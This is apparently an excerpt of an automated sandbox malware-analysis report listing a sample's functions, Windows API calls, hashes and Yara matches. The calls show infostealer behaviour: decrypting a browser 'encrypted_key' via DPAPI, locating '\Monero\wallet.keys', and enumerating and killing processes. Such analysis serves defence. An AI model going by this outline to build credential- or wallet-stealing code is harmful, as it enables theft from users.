                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 5043fad014ee28117cb179d8df1a3e01a7a2fa9f34506089f66241ab3466d06d
                            • Instruction ID: 830f600e5c103dca3e46b875236035c0a6a7e2f6736cc036d3b86edc661fd0ee
                            • Opcode Fuzzy Hash: 5043fad014ee28117cb179d8df1a3e01a7a2fa9f34506089f66241ab3466d06d
                            • Instruction Fuzzy Hash: EC410371D10109ABCB04EFA4E845AEE7B74FF94314F10C418F51977291DB75AA09EF92
                            Function 00569CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00569D39
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
                              • Part of subcall function 00569AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A
                              • Part of subcall function 00569AC0: LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F
                              • Part of subcall function 00569B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00569B84
                              • Part of subcall function 00569B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00569BA3
                              • Part of subcall function 00569B60: LocalFree.KERNEL32(?), ref: 00569BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 7d7a788f4fd899dae7de38ea724ad2d5e2c4ad0cd0c2150fe30b71f4bc68d1d5
                            • Instruction ID: 2b107612f0dcb7a303b4fc18db1ded244e144cabe13aa2dc09b310bf12e012b4
                            • Opcode Fuzzy Hash: 7d7a788f4fd899dae7de38ea724ad2d5e2c4ad0cd0c2150fe30b71f4bc68d1d5
                            • Instruction Fuzzy Hash: 2B3101B5D1010AABDF14DFE4DC89AEFBBBCBF88304F144529E905A7241E7349A05CBA5
                            Function 005794D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 005794EB
                              • Part of subcall function 00578D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0057951E,00000000), ref: 00578D5B
                              • Part of subcall function 00578D50: RtlAllocateHeap.NTDLL(00000000), ref: 00578D62
                              • Part of subcall function 00578D50: wsprintfW.USER32 ref: 00578D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005795AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 005795C9
                            • CloseHandle.KERNEL32(00000000), ref: 005795D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 90590247072bf62ce360ea1e055735496f3079bea5683f645869912a36365e2b
                            • Instruction ID: 149647bc28ec40841099482fa95e51df3f832c1b0dfbdcf1341cdba1820fa151
                            • Opcode Fuzzy Hash: 90590247072bf62ce360ea1e055735496f3079bea5683f645869912a36365e2b
                            • Instruction Fuzzy Hash: 77314D71E00218AFDB15DFD0DC49BEDBB78FF84300F108459E50AAB184DB78AA89DB52
                            Function 00578680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005805B7), ref: 005786CA
                            • Process32First.KERNEL32(?,00000128), ref: 005786DE
                            • Process32Next.KERNEL32(?,00000128), ref: 005786F3
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • CloseHandle.KERNEL32(?), ref: 00578761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 12b59eb6cb0e68ef779dd4853ddf0970b2aa92c29ae788b9f590546ef0e81405
                            • Instruction ID: 0138638f263897c133fc8a219451c92ab9bca603a5fafeff443b30d102bcf879
                            • Opcode Fuzzy Hash: 12b59eb6cb0e68ef779dd4853ddf0970b2aa92c29ae788b9f590546ef0e81405
                            • Instruction Fuzzy Hash: 78316F71901119ABCB24EF55EC49FEEBB78FF85700F108199E50EA2190DB346A45DFA2
                            Function 00577980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00580E00,00000000,?), ref: 005779B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005779B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00580E00,00000000,?), ref: 005779C4
                            • wsprintfA.USER32 ref: 005779F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 642de8820540c194ceb3232431c5a3a7b316c4d001c2ce2420322b0c3d92ed3a
                            • Instruction ID: 77fb60db98b35624c7537dc06dc3b5d1579d400a495860e40f5b4767ac8f4747
                            • Opcode Fuzzy Hash: 642de8820540c194ceb3232431c5a3a7b316c4d001c2ce2420322b0c3d92ed3a
                            • Instruction Fuzzy Hash: 9E1118B2904118AACB149FC9ED45BBEBBF8FB4DB11F10811AF605A2280D33D5940DBB5
                            Function 00575050 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 0057508A
                            • lstrcat.KERNEL32(?,00E4E428), ref: 005750A8
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 0057492C
                              • Part of subcall function 00574910: FindFirstFileA.KERNEL32(?,?), ref: 00574943
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                            • String ID: ($
                            • API String ID: 2699682494-3146928370
                            • Opcode ID: fbdaf9c1fa94683ee861b2fbc53a37b2d02ac2cb8cd8784c7e08a6872aecfd19
                            • Instruction ID: e6dfa6875a6204edc579255b347e101ed2e853fbd0314ceabc6017ac978e8a31
                            • Opcode Fuzzy Hash: fbdaf9c1fa94683ee861b2fbc53a37b2d02ac2cb8cd8784c7e08a6872aecfd19
                            • Instruction Fuzzy Hash: E401847690020867C794FB60EC4AEFE773CBBE5300F008554B65A96191EF749AC8DFA6
                            Function 0057C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0057C74E
                              • Part of subcall function 0057BF9F: __amsg_exit.LIBCMT ref: 0057BFAF
                            • __getptd.LIBCMT ref: 0057C765
                            • __amsg_exit.LIBCMT ref: 0057C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0057C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 1f8e891650e38898511139c197476a6e0bb42d13fe531ecad285a2e385377411
                            • Instruction ID: e2c6011679cdc75cff2074becc5bed9ab3e313ed28906aef817a0129f9791ef9
                            • Opcode Fuzzy Hash: 1f8e891650e38898511139c197476a6e0bb42d13fe531ecad285a2e385377411
                            • Instruction Fuzzy Hash: FBF06D329006029BE724BBB8784EB5D3FA0BF80B20F20C14DF40CA62D2DF645940BF56
                            Function 00574F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00574F7A
                            • lstrcat.KERNEL32(?,00581070), ref: 00574F97
                            • lstrcat.KERNEL32(?,00E48F78), ref: 00574FAB
                            • lstrcat.KERNEL32(?,00581074), ref: 00574FBD
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 0057492C
                              • Part of subcall function 00574910: FindFirstFileA.KERNEL32(?,?), ref: 00574943
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FDC), ref: 00574971
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FE0), ref: 00574987
                              • Part of subcall function 00574910: FindNextFileA.KERNEL32(000000FF,?), ref: 00574B7D
                              • Part of subcall function 00574910: FindClose.KERNEL32(000000FF), ref: 00574B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: fb8a6b214fcd72a12906b09728ec93565c02191835645678dbfc02529ffe22dc
                            • Instruction ID: 0a4d468d7039952217d785a19498cd4830426e40f3c88711fffb4552901df1b9
                            • Opcode Fuzzy Hash: fb8a6b214fcd72a12906b09728ec93565c02191835645678dbfc02529ffe22dc
                            • Instruction Fuzzy Hash: 20217476900209A7C794FBA0EC4AEED773CBBD5300F008554B65A96181EF789AC9CF96